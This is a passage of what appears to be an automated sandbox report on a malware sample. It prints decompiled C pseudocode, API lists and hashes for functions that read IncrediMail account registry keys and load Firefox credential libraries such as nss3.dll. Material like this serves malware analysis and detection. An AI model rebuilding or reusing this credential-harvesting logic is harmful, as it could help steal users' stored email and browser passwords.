                                                                                              								E00402D9A(_t66, _t67, 0xff, _t77, _v8,  &_v528);
                                                                                              								_v16 = _v16 + 1;
                                                                                              								_t60 = E0040EC05(_v8, _v16,  &_v528);
                                                                                              								_t74 = _t74 + 0xc;
                                                                                              							}
                                                                                              							RegCloseKey(_v8);
                                                                                              						}
                                                                                              						_v12 = _v12 + 1;
                                                                                              						_t44 = E0040EC05(_a4, _v12,  &_v272);
                                                                                              						_t73 = _t74 + 0xc;
                                                                                              					}
                                                                                              					_t40 = RegCloseKey(_a4);
                                                                                              				}
                                                                                              				 *((char*)(_t67 + 0xa9c)) = 0;
                                                                                              				return _t40;
                                                                                              			}


























                                                                                              APIs
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                              • memset.MSVCRT ref: 00403005
                                                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                              • memset.MSVCRT ref: 00403052
                                                                                              • sprintf.MSVCRT ref: 0040306A
                                                                                              • memset.MSVCRT ref: 0040309B
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004030E3
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040310C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$Close$EnumOpensprintf
                                                                                              • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                              • API String ID: 3672803090-3168940695
                                                                                              • Opcode ID: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                                                              • Instruction ID: 2ec2bfd25db4f87ede08292043277b4916c0dadc31aa5cf960337fea200e46ca
                                                                                              • Opcode Fuzzy Hash: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                                                              • Instruction Fuzzy Hash: D6314EB290021CBADB11EB95CC81EEEBB7CAF14344F0041B6B909A1051E7799F948F64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 48%
                                                                                              			E00407A64(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
                                                                                              				char* _v0;
                                                                                              				int _v4;
                                                                                              				int _t39;
                                                                                              				char* _t49;
                                                                                              				void* _t51;
                                                                                              				int _t64;
                                                                                              				signed int _t70;
                                                                                              				signed int _t71;
                                                                                              
                                                                                              				_t59 = __ecx;
                                                                                              				_t71 = _t70 & 0xfffffff8;
                                                                                              				E004118A0(0x204c, __ecx);
                                                                                              				_t39 = GetMenuItemCount(_a8.cbSize);
                                                                                              				_a4 = _t39;
                                                                                              				_v4 = 0;
                                                                                              				if(_t39 <= 0) {
                                                                                              					L15:
                                                                                              					return _t39;
                                                                                              				} else {
                                                                                              					do {
                                                                                              						memset( &_a57, 0, 0x1000);
                                                                                              						_t71 = _t71 + 0xc;
                                                                                              						_a44 =  &_a56;
                                                                                              						_a8.cbSize = 0x30;
                                                                                              						_a12 = 0x36;
                                                                                              						_a48 = 0x1000;
                                                                                              						_a56 = 0;
                                                                                              						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
                                                                                              							goto L14;
                                                                                              						}
                                                                                              						if(_a56 == 0) {
                                                                                              							L12:
                                                                                              							_t80 = _a28;
                                                                                              							if(_a28 != 0) {
                                                                                              								_push(0);
                                                                                              								_push(_a28);
                                                                                              								_push(_a4);
                                                                                              								E00407A64(_t59, _t80);
                                                                                              								_t71 = _t71 + 0xc;
                                                                                              							}
                                                                                              							goto L14;
                                                                                              						}
                                                                                              						_t64 = _a24;
                                                                                              						_a4160 = 0;
                                                                                              						memset( &_a4161, 0, 0x1000);
                                                                                              						_t49 = strchr( &_a56, 9);
                                                                                              						_t71 = _t71 + 0x14;
                                                                                              						_v0 = _t49;
                                                                                              						if(_a28 != 0) {
                                                                                              							if(_a12 == 0) {
                                                                                              								 *0x4171b4 =  *0x4171b4 + 1;
                                                                                              								_t64 =  *0x4171b4 + 0x11558;
                                                                                              								__eflags = _t64;
                                                                                              							} else {
                                                                                              								_t64 = _v4 + 0x11171;
                                                                                              							}
                                                                                              						}
                                                                                              						_t51 = E00407D89(_t64,  &_a4160);
                                                                                              						_pop(_t59);
                                                                                              						if(_t51 != 0) {
                                                                                              							if(_v0 != 0) {
                                                                                              								strcat( &_a4160, _v0);
                                                                                              								_pop(_t59);
                                                                                              							}
                                                                                              							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
                                                                                              						}
                                                                                              						goto L12;
                                                                                              						L14:
                                                                                              						_v4 = _v4 + 1;
                                                                                              						_t39 = _v4;
                                                                                              					} while (_t39 < _a4);
                                                                                              					goto L15;
                                                                                              				}
                                                                                              			}












                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                                                              • String ID: 0$6
                                                                                              • API String ID: 1757351179-3849865405
                                                                                              • Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                              • Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
                                                                                              • Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                              • Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                              • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
                                                                                              • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                              • memcpy.MSVCRT ref: 0040EA04
                                                                                              • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                              Strings
                                                                                              • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
                                                                                              • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
                                                                                              • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
                                                                                              • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                              • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                              • API String ID: 1640410171-2022683286
                                                                                              • Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                              • Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
                                                                                              • Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                              • Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 58%
                                                                                              			E00404837(void* __ecx) {
                                                                                              				intOrPtr _v8;
                                                                                              				char _v12;
                                                                                              				struct HWND__* _t6;
                                                                                              				_Unknown_base(*)()* _t11;
                                                                                              				struct HWND__* _t15;
                                                                                              				void* _t20;
                                                                                              				struct HINSTANCE__* _t23;
                                                                                              
                                                                                              				_v12 = 8;
                                                                                              				_v8 = 0xff;
                                                                                              				_t15 = 0;
                                                                                              				_t20 = 0;
                                                                                              				_t23 = LoadLibraryA("comctl32.dll");
                                                                                              				if(_t23 == 0) {
                                                                                              					L5:
                                                                                              					__imp__#17();
                                                                                              					_t6 = 1;
                                                                                              					L6:
                                                                                              					if(_t6 != 0) {
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
                                                                                              						return 0;
                                                                                              					}
                                                                                              				}
                                                                                              				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                              				if(_t11 != 0) {
                                                                                              					_t20 = 1;
                                                                                              					_t15 =  *_t11( &_v12);
                                                                                              				}
                                                                                              				FreeLibrary(_t23);
                                                                                              				if(_t20 == 0) {
                                                                                              					goto L5;
                                                                                              				} else {
                                                                                              					_t6 = _t15;
                                                                                              					goto L6;
                                                                                              				}
                                                                                              			}











                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(comctl32.dll,75144DE0,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 00404856
                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 0040487C
                                                                                              • #17.COMCTL32(?,00000000,?,?,?,0040B9C9,75144DE0), ref: 0040488A
                                                                                              • MessageBoxA.USER32 ref: 004048A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                              • API String ID: 2780580303-317687271
                                                                                              • Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                              • Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
                                                                                              • Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                              • Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E004081B5(void* __eflags, char* _a4) {
                                                                                              				void* __esi;
                                                                                              				void* _t3;
                                                                                              				int _t6;
                                                                                              
                                                                                              				_t3 = E0040614B(_a4);
                                                                                              				if(_t3 != 0) {
                                                                                              					strcpy(0x4171b8, _a4);
                                                                                              					strcpy(0x4172c0, "general");
                                                                                              					_t6 = GetPrivateProfileIntA(0x4172c0, "rtl", 0, 0x4171b8);
                                                                                              					asm("sbb eax, eax");
                                                                                              					 *0x417304 =  ~(_t6 - 1) + 1;
                                                                                              					E00407DC1(0x417308, "charset", 0x3f);
                                                                                              					E00407DC1(0x417348, "TranslatorName", 0x3f);
                                                                                              					return E00407DC1(0x417388, "TranslatorURL", 0xff);
                                                                                              				}
                                                                                              				return _t3;
                                                                                              			}







                                                                                              APIs
                                                                                                • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                              • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
                                                                                              • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
                                                                                              • GetPrivateProfileIntA.KERNEL32 ref: 004081F0
                                                                                                • Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivateProfilestrcpy$AttributesFileString
                                                                                              • String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
                                                                                              • API String ID: 185930432-2094606381
                                                                                              • Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                              • Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
                                                                                              • Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                              • Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040DEA9() {
                                                                                              				int _t3;
                                                                                              				struct HINSTANCE__* _t5;
                                                                                              				struct HINSTANCE__* _t6;
                                                                                              				struct HINSTANCE__* _t9;
                                                                                              
                                                                                              				_t6 = GetModuleHandleA("nss3.dll");
                                                                                              				_t5 = GetModuleHandleA("sqlite3.dll");
                                                                                              				_t3 = GetModuleHandleA("mozsqlite3.dll");
                                                                                              				_t9 = _t3;
                                                                                              				if(_t6 != 0) {
                                                                                              					_t3 = FreeLibrary(_t6);
                                                                                              				}
                                                                                              				if(_t5 != 0) {
                                                                                              					_t3 = FreeLibrary(_t5);
                                                                                              				}
                                                                                              				if(_t9 != 0) {
                                                                                              					return FreeLibrary(_t9);
                                                                                              				}
                                                                                              				return _t3;
                                                                                              			}








                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(nss3.dll,751457D0,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
                                                                                              • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
                                                                                              • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHandleLibraryModule
                                                                                              • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                                              • API String ID: 662261464-3550686275
                                                                                              • Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                                              • Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
                                                                                              • Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                                              • Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 86%
                                                                                              			E0040E172(char* __edi, char* __esi) {
                                                                                              				void _v267;
                                                                                              				char _v268;
                                                                                              				char* _t15;
                                                                                              				void* _t38;
                                                                                              				char* _t48;
                                                                                              
                                                                                              				_t49 = __esi;
                                                                                              				_t48 = __edi;
                                                                                              				if(__esi[1] != 0x3a) {
                                                                                              					_t15 = strchr( &(__esi[2]), 0x3a);
                                                                                              					if(_t15 == 0) {
                                                                                              						_t38 = E004069D2(0, "\\systemroot");
                                                                                              						if(_t38 < 0) {
                                                                                              							if( *__esi != 0x5c) {
                                                                                              								strcpy(__edi, __esi);
                                                                                              							} else {
                                                                                              								_v268 = 0;
                                                                                              								memset( &_v267, 0, 0x104);
                                                                                              								E00406325( &_v268);
                                                                                              								memcpy(__edi,  &_v268, 2);
                                                                                              								__edi[2] = 0;
                                                                                              								strcat(__edi, __esi);
                                                                                              							}
                                                                                              						} else {
                                                                                              							_v268 = 0;
                                                                                              							memset( &_v267, 0, 0x104);
                                                                                              							E00406325( &_v268);
                                                                                              							strcpy(__edi,  &_v268);
                                                                                              							_t8 =  &(_t49[0xb]); // 0xb
                                                                                              							strcat(__edi, _t38 + _t8);
                                                                                              						}
                                                                                              						L11:
                                                                                              						return _t48;
                                                                                              					}
                                                                                              					_push(_t15 - 1);
                                                                                              					L4:
                                                                                              					strcpy(_t48, ??);
                                                                                              					goto L11;
                                                                                              				}
                                                                                              				_push(__esi);
                                                                                              				goto L4;
                                                                                              			}









                                                                                              APIs
                                                                                              • strchr.MSVCRT ref: 0040E18A
                                                                                              • strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                                • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
                                                                                                • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
                                                                                                • Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A
                                                                                              • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
                                                                                              • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
                                                                                              • memset.MSVCRT ref: 0040E1CF
                                                                                                • Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                                                • Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                                              • memset.MSVCRT ref: 0040E217
                                                                                              • memcpy.MSVCRT ref: 0040E232
                                                                                              • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                              • String ID: \systemroot
                                                                                              • API String ID: 1680921474-1821301763
                                                                                              • Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                                              • Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
                                                                                              • Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                                              • Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 67%
                                                                                              			E00405BE4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
                                                                                              				void* __esi;
                                                                                              				intOrPtr* _t27;
                                                                                              				void* _t30;
                                                                                              				struct HWND__* _t32;
                                                                                              				void* _t35;
                                                                                              				intOrPtr* _t36;
                                                                                              
                                                                                              				_t30 = __edx;
                                                                                              				_t27 = __ecx;
                                                                                              				_push(__ebx);
                                                                                              				_push(__edi);
                                                                                              				_t32 =  *(__ecx + 4);
                                                                                              				_t35 = __ecx + 0xc;
                                                                                              				 *(_t35 + 0x10) = _t32;
                                                                                              				GetClientRect(_t32, _t35 + 0xa14);
                                                                                              				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
                                                                                              				GetWindow(GetWindow(_t32, 5), 0);
                                                                                              				do {
                                                                                              					__eax = E00401657(__edi, __esi);
                                                                                              					__edi = GetWindow(__edi, 2);
                                                                                              				} while (__edi != 0);
                                                                                              				__esi = GetDlgItem;
                                                                                              				__edi = 0x3ed;
                                                                                              				GetDlgItem( *(__ebx + 4), 0x3ed) = E0040F037(__eax);
                                                                                              				 *__esp = 0x3ee;
                                                                                              				GetDlgItem(??, ??) = E0040F037(__eax);
                                                                                              				 *__esp = 0x3ef;
                                                                                              				GetDlgItem( *(__ebx + 4),  *(__ebx + 4)) = E0040F037(__eax);
                                                                                              				 *__esp = 0x3f4;
                                                                                              				GetDlgItem( *(__ebx + 4), ??) = E0040F037(__eax);
                                                                                              				__eax =  *(__ebx + 4);
                                                                                              				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
                                                                                              				_pop(__edi);
                                                                                              				_pop(__esi);
                                                                                              				__ecx = __ebx;
                                                                                              				_pop(__ebx);
                                                                                              				_t36 = _t27;
                                                                                              				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
                                                                                              				 *((intOrPtr*)( *_t36 + 0x18))();
                                                                                              				E00406491(_t30,  *((intOrPtr*)(_t36 + 4)));
                                                                                              				return 0;
                                                                                              			}










                                                                                              APIs
                                                                                              • GetClientRect.USER32 ref: 00405BFB
                                                                                              • GetWindow.USER32(?,00000005), ref: 00405C13
                                                                                              • GetWindow.USER32(00000000), ref: 00405C16
                                                                                                • Part of subcall function 00401657: GetWindowRect.USER32 ref: 00401666
                                                                                                • Part of subcall function 00401657: MapWindowPoints.USER32 ref: 00401681
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405C22
                                                                                              • GetDlgItem.USER32 ref: 00405C39
                                                                                              • GetDlgItem.USER32 ref: 00405C4B
                                                                                              • GetDlgItem.USER32 ref: 00405C5D
                                                                                              • GetDlgItem.USER32 ref: 00405C6F
                                                                                              • GetDlgItem.USER32 ref: 00405C7D
                                                                                              • SetFocus.USER32(00000000), ref: 00405C80
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ItemWindow$Rect$ClientFocusPoints
                                                                                              • String ID:
                                                                                              • API String ID: 2187283481-0
                                                                                              • Opcode ID: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                              • Instruction ID: 7666b00b3ddace13e8d54cd994e266c410995bf231072ec337e33f1596805ccb
                                                                                              • Opcode Fuzzy Hash: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                              • Instruction Fuzzy Hash: 1A115471500304ABDB116F25CD49E6BBFADDF41758F05843AF544AB591CB79D8028A68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 92%
                                                                                              			E00401A50(char* __edi, int __fp0) {
                                                                                              				void* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				void* _v16;
                                                                                              				void* _v20;
                                                                                              				int _v28;
                                                                                              				int _v36;
                                                                                              				void* _v40;
                                                                                              				void* _v44;
                                                                                              				void* _v48;
                                                                                              				void* _v52;
                                                                                              				void* _v56;
                                                                                              				void* _v60;
                                                                                              				char _v64;
                                                                                              				int _t79;
                                                                                              				intOrPtr _t80;
                                                                                              				int _t81;
                                                                                              				signed int _t94;
                                                                                              				int _t98;
                                                                                              				int _t100;
                                                                                              				void* _t104;
                                                                                              				void* _t106;
                                                                                              				intOrPtr _t115;
                                                                                              				char _t117;
                                                                                              				char* _t118;
                                                                                              				void* _t119;
                                                                                              				void* _t120;
                                                                                              				int _t122;
                                                                                              				signed int _t123;
                                                                                              				int* _t125;
                                                                                              				int _t159;
                                                                                              				int _t165;
                                                                                              
                                                                                              				_t159 = __fp0;
                                                                                              				_t118 = __edi;
                                                                                              				_t125 = (_t123 & 0xfffffff8) - 0x40;
                                                                                              				_t79 = strlen(__edi);
                                                                                              				asm("fldz");
                                                                                              				_t104 = 0;
                                                                                              				_v28 = __fp0;
                                                                                              				_t120 = 0;
                                                                                              				_t106 = _t119;
                                                                                              				_v36 = _t79;
                                                                                              				_v56 = 0;
                                                                                              				_v52 = 0;
                                                                                              				_v48 = 0;
                                                                                              				_v44 = 0;
                                                                                              				_v60 = 0;
                                                                                              				_v40 = 0;
                                                                                              				_v12 = 0x20;
                                                                                              				_v20 = 0;
                                                                                              				_v8 = 0;
                                                                                              				_v16 = 0;
                                                                                              				if(_t79 > 0) {
                                                                                              					do {
                                                                                              						_t117 =  *((intOrPtr*)(_t120 + _t118));
                                                                                              						_v64 = _t117;
                                                                                              						if(_t117 - 0x41 <= 0x19) {
                                                                                              							_v56 = _v56 + 1;
                                                                                              						}
                                                                                              						if(_t117 - 0x61 <= 0x19) {
                                                                                              							_v52 = _v52 + 1;
                                                                                              						}
                                                                                              						if(_t117 - 0x30 <= 9) {
                                                                                              							_v48 = _v48 + 1;
                                                                                              						}
                                                                                              						if(_t117 - 0x20 <= 0xf) {
                                                                                              							_v44 = _v44 + 1;
                                                                                              						}
                                                                                              						if(_t117 - 0x3a <= 6) {
                                                                                              							_v60 = _v60 + 1;
                                                                                              						}
                                                                                              						if(_t117 - 0x5b <= 5) {
                                                                                              							_v60 = _v60 + 1;
                                                                                              						}
                                                                                              						if(_t117 < 0x7b) {
                                                                                              							L16:
                                                                                              							if(_t117 > 0x7e) {
                                                                                              								goto L17;
                                                                                              							}
                                                                                              						} else {
                                                                                              							if(_t117 > 0x7e) {
                                                                                              								L17:
                                                                                              								_v40 = _v40 + 1;
                                                                                              							} else {
                                                                                              								_v60 = _v60 + 1;
                                                                                              								goto L16;
                                                                                              							}
                                                                                              						}
                                                                                              						if(_t120 != _t104) {
                                                                                              							_t94 = 0;
                                                                                              							if(_v8 <= 0) {
                                                                                              								L27:
                                                                                              								_t94 = _t94 | 0xffffffff;
                                                                                              							} else {
                                                                                              								L21:
                                                                                              								L21:
                                                                                              								if(_t94 < 0 || _t94 >= _v8) {
                                                                                              									_t115 = 0;
                                                                                              								} else {
                                                                                              									_t115 =  *((intOrPtr*)(_v20 + _t94));
                                                                                              								}
                                                                                              								if(_t115 == _t117) {
                                                                                              									goto L28;
                                                                                              								}
                                                                                              								_t94 = _t94 + 1;
                                                                                              								if(_t94 < _v8) {
                                                                                              									goto L21;
                                                                                              								} else {
                                                                                              									goto L27;
                                                                                              								}
                                                                                              							}
                                                                                              							L28:
                                                                                              							_t104 = 0;
                                                                                              							if(_t94 < 0) {
                                                                                              								E004045E8( &_v20, _v64);
                                                                                              								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
                                                                                              								_pop(_t106);
                                                                                              								if(_t98 != 1) {
                                                                                              									_t47 = _t98 - 2; // -2
                                                                                              									_t106 = _t47;
                                                                                              									if(_t106 > 3) {
                                                                                              										if(_t98 < 6) {
                                                                                              											if(_t98 > 0xa) {
                                                                                              												goto L40;
                                                                                              											}
                                                                                              										} else {
                                                                                              											if(_t98 > 0xa) {
                                                                                              												goto L40;
                                                                                              											} else {
                                                                                              												_t159 = _v28 +  *0x414510;
                                                                                              											}
                                                                                              											goto L41;
                                                                                              										}
                                                                                              									} else {
                                                                                              										_t159 = _v28 +  *0x414518;
                                                                                              										goto L41;
                                                                                              									}
                                                                                              								} else {
                                                                                              									_t165 = _v28;
                                                                                              									goto L30;
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
                                                                                              								_t165 = _v28;
                                                                                              								_pop(_t106);
                                                                                              								if(_t100 != 0) {
                                                                                              									_t159 = _t165 +  *0x414520;
                                                                                              								} else {
                                                                                              									L30:
                                                                                              									_t159 = _t165 +  *0x414528;
                                                                                              								}
                                                                                              								goto L41;
                                                                                              							}
                                                                                              						} else {
                                                                                              							E004045E8( &_v20, _v64);
                                                                                              							L40:
                                                                                              							_t159 = _v28 +  *0x414508;
                                                                                              							L41:
                                                                                              							_v28 = _t159;
                                                                                              						}
                                                                                              						_t120 = _t120 + 1;
                                                                                              					} while (_t120 < _v36);
                                                                                              				}
                                                                                              				_v64 = _t104;
                                                                                              				_t80 = 0x1a;
                                                                                              				if(_v56 != _t104) {
                                                                                              					_v64 = _t80;
